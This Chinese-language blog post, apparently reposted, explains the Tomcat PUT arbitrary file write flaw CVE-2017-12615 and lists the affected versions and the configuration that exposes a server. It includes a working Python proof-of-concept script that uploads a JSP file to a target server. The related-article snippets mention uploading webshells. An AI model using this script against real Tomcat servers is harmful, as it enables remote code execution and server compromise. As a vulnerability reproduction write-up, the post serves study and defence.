CVE-2017-12615(Tomcat PUT方法任意写文件漏洞)

最新推荐文章于 2025-06-11 16:21:32 发布
转载 最新推荐文章于 2025-06-11 16:21:32 发布 · 1k 阅读 · 0

本文详细解析了CVE-2017-12615漏洞,当Tomcat在Windows环境下运行并启用HTTP PUT请求时,攻击者可能通过构造特定请求上传任意代码的JSP文件,导致服务器数据泄露或权限获取。文章提供了漏洞影响范围、利用条件及Python PoC示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞简介

当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

影响范围:

Apache Tomcat 7.0.0 - 7.0.81

利用条件

打开Tomcat安装目录的Tomcat7.0\conf\web.xml添加如下配置,在Tomcat7.0版本下默认配置是开启readonly的,需要手动配置readonly为false才可以进行漏洞利用。

漏洞利用

漏洞poc:

#!/usr/bin/env python
"""
CVE-2017-12615, exploits the file type extension bypass in tomcat7.0.0-7.0.79 (maybe more?)
Pretty restrictive in that it requires PUTS to be enabled and is windows only.
Could be conducted in CURL commands... but this was more fun right

Sample file contentes "test.jsp": <% out.write("<html><body><h3>JSP file uploaded</h3></body></html>"); %>

Sample run:
root@kali:~/tomcat# ./ex.py --target 192.168.1.60 -r test1234.jsp --lfile test1.jsp
http://192.168.1.60:8080/test1234.jsp/
Hopefully done:)

Checking if there:

root@kali:~/tomcat# curl http://192.168.1.60:8080/test1234.jsp
<html><body><h3>JSP file uploaded</h3></body></html>

some obligatory thing about name: matthew fulton 
"""

import argparse
import requests as r
import sys


Help = """exploits CVE-2017-12615, lame but funny, by default will just try to put it in the\nroot of the webserver. Windows only unfortunately and requires PUTS to be enabled.""" 
parser=argparse.ArgumentParser(description=help)
parser.add_argument('--target', '-target', default="127.0.0.1", help="Target IP", required=True)
parser.add_argument('--port', '-p', default="8080")
parser.add_argument('--lfile', '-l', help="Full path to file. This is JSP file to upload")
parser.add_argument('--rfile', '-r', help="Remote system file name", default="test123.jsp")
args = parser.parse_args()
target = args.target
port = args.port
localfile = args.lfile
remotefile = args.rfile

url = "http://" + target+":"+port + "/" + remotefile + "/"

print url

def upload(url, localfile,remotefile):
	f=open(localfile, "r")
	rawfiledata = f.read()
	r.put(url,rawfiledata)
	print "Hopefully done:)"
	sys.exit(0)

def main():
	upload(url, localfile, remotefile)
if __name__ == '__main__':
	main()
Tomcat 通过 PUT 方法任意文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1557
CVE-2017-12615 对应的漏洞任意文件入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了权限(readonly=false),导致可以使用PUT方法上传任意文件
CVE-2017-12615 Tomcat PUT 任意文件上传 漏洞利用教程
alert['Hello World']
11-14 2416
目录漏洞描述影响版本漏洞环境搭建漏洞检测漏洞利用漏洞加固 漏洞描述   在启用HTTP PUT的Windows上运行Apache Tomcat 7.0.0至7.0.79时(例如,通过将Default的只读初始化参数设置为false),可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。 影响版本 tomcat 7.0.0至7.0.79 漏洞环境搭建 漏洞检测 漏洞利用 漏洞加固 ...
Tomcat PUT方法任意文件漏洞CVE-2017-12615
weixin_45653478的博客
05-02 1930
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件任意位置,从而实现任意文件入。
CVE-2017-12615源码分析与漏洞复现(Tomcat 任意文件上传)
最新发布
spinage的博客
06-11 1575
CVE-2017-12615是Apache Tomcat 7.0.0至7.0.81版本中的高危远程代码执行漏洞,当服务器配置readonly=false时,攻击者可利用HTTP PUT方法上传恶意JSP文件漏洞成因在于文件后缀校验缺失和系统路径规范化特性(如Windows文件名处理和Java路径规范化),可通过三种方式绕过:添加空格、NTFS数据流或路径分隔符。利用该漏洞可上传webshell实现RCE,影响CVSS评分8.1。官方在7.0.82版本中完全修复该漏洞。复现过程包括搭建靶机环境、构造特殊请求
CVE-2017-12615 Tomcat PUT方法任意文件漏洞
weixin_51387754的博客
01-04 2463
漏洞简介 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务
Tomcat PUT方法任意文件CVE-2017- 12615漏洞复现
weixin_51198941的博客
09-06 549
CVE-2017-12615是Apache Tomcat的一个远程代码执行漏洞。该漏洞影响Apache Tomcat 7.0.0至7.0.79版本(7.0.81修复不完全)。漏洞原理Tomcat 运行在 Windows 主机上,且启用了HTTP PUT
tomcat put方法任意文件漏洞
qq_48744846的博客
04-14 1800
开启容器 抓包 使用put上传jsp文件查看put漏洞是否存在 存在
漏洞复现】Tomcat PUT方法任意文件漏洞CVE-2017-12615
weixin_42090431的博客
01-02 1070
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
漏洞复现】Tomcat 任意文件漏洞CVE-2017-12615
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 482
Tomcat 启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件文件中的代码被服务器执行。
Tomcat PUT 方法任意文件漏洞CVE-2017-12615)复现
weixin_47498728的博客
01-06 1214
tomcat本身不允许上传 jsp 文件,但是1.jsp/ 加了 / 就不是 jsp 文件,所以文件可以成功上传。系统保存文件时因为不能存在/字符,所以/被忽略了,所以文件名从 1.jsp/ -> 1.jsp,至此jsp文件完成了上传并保存。
Tomcat PUT方法任意文件 CVE-2017-12615 漏洞复现
Senimo
07-30 837
Tomcat PUT方法任意文件 CVE-2017-12615 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞EXP五、参考链接 一、漏洞描述 在启用 HTTP PUT 的 Windows 上运行 Apache Tomcat 7.0.0 到 7.0.79 时(例如,通过将 Default 的只读初始化参数设置为 false),可以通过特制的请求将 JSP 文件上传到服务器。然后可以请求这个 JSP,并且它包含的任何代码都将由服务器执行。 二、漏洞影响 7.0.0 < A
Tomcat 任意文件漏洞CVE-2017-12615
ANOrange的博客
03-29 603
Tomcat 任意文件漏洞CVE-2017-12615漏洞复现
CVE-2017-12615(远程代码执行漏洞
Biu_Biu_Bi的博客
04-07 4458
Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。2、使用burpsuite抓包,修改GET为PUT上传方式,添加文件名1.jsp/,添加shell脚本。1、使用冰蝎v4.05生成jsp脚本。5、打开ip:8080,成功开启。4、测试成功上传Shell。
cve-2017-12615漏洞复现
06-28
cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现该漏洞,需要满足以下条件: 1. 目标服务器上运行的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值